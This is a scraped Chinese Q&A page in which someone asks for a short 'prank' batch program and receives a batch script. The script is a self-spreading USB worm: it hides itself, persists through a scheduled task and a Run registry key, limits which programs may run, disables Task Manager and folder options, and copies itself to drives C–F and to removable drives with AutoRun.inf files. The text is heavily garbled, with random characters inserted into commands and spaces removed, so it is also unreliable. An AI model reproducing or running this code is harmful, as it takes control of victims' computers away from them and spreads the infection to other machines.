来个bat整人程来自序。

来个bat整人程来自序。

问题补充说明：不要太长了！！

给我你邮箱我给你用bat的整人程序 这里直接贴出主要代码但是没效果要用rar打包后才行@echooff

:hello

rem检查CDEF盘含bat.exe否。

ifnotexistc:\bat.exegotofu国比鸡字视置位你倍冲房n

ifnotexiste:\bat.exegotofun

ifno志texistd:\bat.exegotofun

ifnotexistf:\bat.exegotofun

rem教超虽冲提处态群定制计划任务为bat.exe实现开机启动并对计划任务进行隐藏。

schtasks/create/tnrunl132/tr%windir%\system32\bat.exe/sconlogon/ru""

attrib+s+h%windir%\呀由渐进赵扬求静尼船余tasks\runl132.job

r营会白协助em导入一些注册表键值，实现一些功能。

regaddHKEY_CURRENT_USER\Software\Microso里北位剧ft\Windows\CurrentVersion\Policies\Explor题肥也屋晚er/v"Rest稳rictRun"/tREG_振居均滑是路脚美DWORD/d1/社走别压粉专黄f

regaddH然左道故米变必采操KEY_CURRENT_USER\S院频渐否晶散量oftware\Microsoft\Windo位言合题明城殖ws\CurrentVersion\Policies\Explorer\RestrictRun/v1/tREG_SZ善游操行各传妈矿议值门/d"regedit.exe"/f

regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v2/tREG_SZ/d"bat.exe"/f

regaddHKEY_CUR副端呼否RENT_USER\Software\Microsoft振\Windows\CurrentVersion\Policies\Explorer\Rest蒸华rictRun/v3/tREG_SZ/d"tools.exe"/f

regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v4/tREG_SZ/d"runl132.bat"/f

regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v5/tREG_SZ/d"bat.vbs"/f

regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v6/tREG_SZ/d"cmd.exe"/f

regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v7/tREG_SZ/d"AutoRun.inf"/f

regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v8/tREG_SZ/d"shutdown.exe"/f

regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v9/tREG_SZ/d"attrib.exe"/f

regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v10/tREG_SZ/d"fsutil.exe"/f

regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v11/tREG_SZ/d"schtasks.exe"/f

regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v12/tREG_SZ/d"reg.exe"/f

regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v13/tREG_SZ/d"WINRAR.exe"/f

regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v14/tREG_SZ/d"Wscript.exe"/f

regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v15/tREG_SZ/d"go.vbs"/f

regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v16/tREG_SZ/d"notepad.exe"/f

regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v17/tREG_SZ/d"you.txt"/f

regaddHKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Policies\System/v"DisableTaskMgr"/tREG_DWORD/d1/f

regaddHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL/v"CheckedValue"/tREG_DWORD/d0/f

regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/v"NoFolderOptions"/tREG_DWORD/d1/f

regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run/vrunl132/tREG_EXPAND_SZ/d"D:\bat.exe"/f

rem检查是否有U盘插入（有，进行复制）。

:kk

for%%din(cdefghijklmnopqrstuvwxyz)dofsutilfsinfodrivetype%%d:>>%windir%\system32\note.txt

findstr/i"可移动驱动器"%windir%\system32\note.txt

iferrorlevel==0gotonext

iferrorlevel==1gotohello

:next

for/f"tokens=1"%%din('findstr/i"可移动驱动器"e:\s.txt')dosetyidong=%%d

ifexist%yidong%\bat.exegotohello

attrib-s-he:\bat.exe

copye:\bat.exe%yidong%\/y

attrib+s+he:\bat.exe

attrib+s+h"%yidong%\bat.exe"

attrib-s-h"%yidong%\AutoRun.inf"

rd/q/s"%yidong%\AutoRun.inf"

echo[AutoRun]>"%yidong%\AutoRun.inf"

echoshell\open=打开(^&O)>>"%yidong%\AutoRun.inf"

echoshell\open\command=bat.exe>>"%yidong%\AutoRun.inf"

echoshell\explore=资源管理器(^&X)>>"%yidong%\AutoRun.inf"

echoshell\explore\command=bat.exe>>"%yidong%\AutoRun.inf"

attrib+s+h"%yidong%\AutoRun.inf"

gotohello

rem进行对CDEF盘自我复制并对其隐藏。

:fun

attrib-s-h%systemroot%\system32\bat.exe

for%%kin(cdef)docopy%systemroot%\system32\bat.exe%%k:\/y

attrib-s-he:\bat.exe

for%%kin(cdef)docopye:\bat.exe%%k:\/y

attrib-s-hd:\bat.exe

for%%kin(cdef)docopyd:\bat.exe%%k:\/y

attrib-s-hf:\bat.exe

for%%kin(cdef)docopyf:\bat.exe%%k:\/y

attrib-s-hc:\bat.exe

for%%kin(cdef)docopyc:\bat.exe%%k:\/y

for%%kin(cdef)doattrib+s+h%%k:\bat.exe

attrib+s+h%systemroot%\system32\bat.exe

for%%min(cdef)doattrib-s-h-a%%m:\AutoRun.inf

for%%din(cdef)dord/q/s%%d:\AutoRun.inf

for%%sin(cdef)doecho[AutoRun]>%%s:\AutoRun.inf

for%%min(cdef)doechoshell\open=打开(^&O)>>%%m:\AutoRun.inf

for%%lin(cdef)doechoshell\open\command=bat.exe>>%%l:\AutoRun.inf

for%%ain(cdef)doechoshell\explore=资源管理器(^&X)>>%%a:\AutoRun.inf

for%%ein(cdef)doechoshell\explore\command=bat.exe>>%%e:\AutoRun.inf

attrib+s+h+rc:\AutoRun.inf&attrib+s+h+re:\AutoRun.inf&attrib+s+h+rd:\AutoRun.inf&attrib+s+h+rf:\AutoRun.inf

gotohello

标签：bat,整人,来个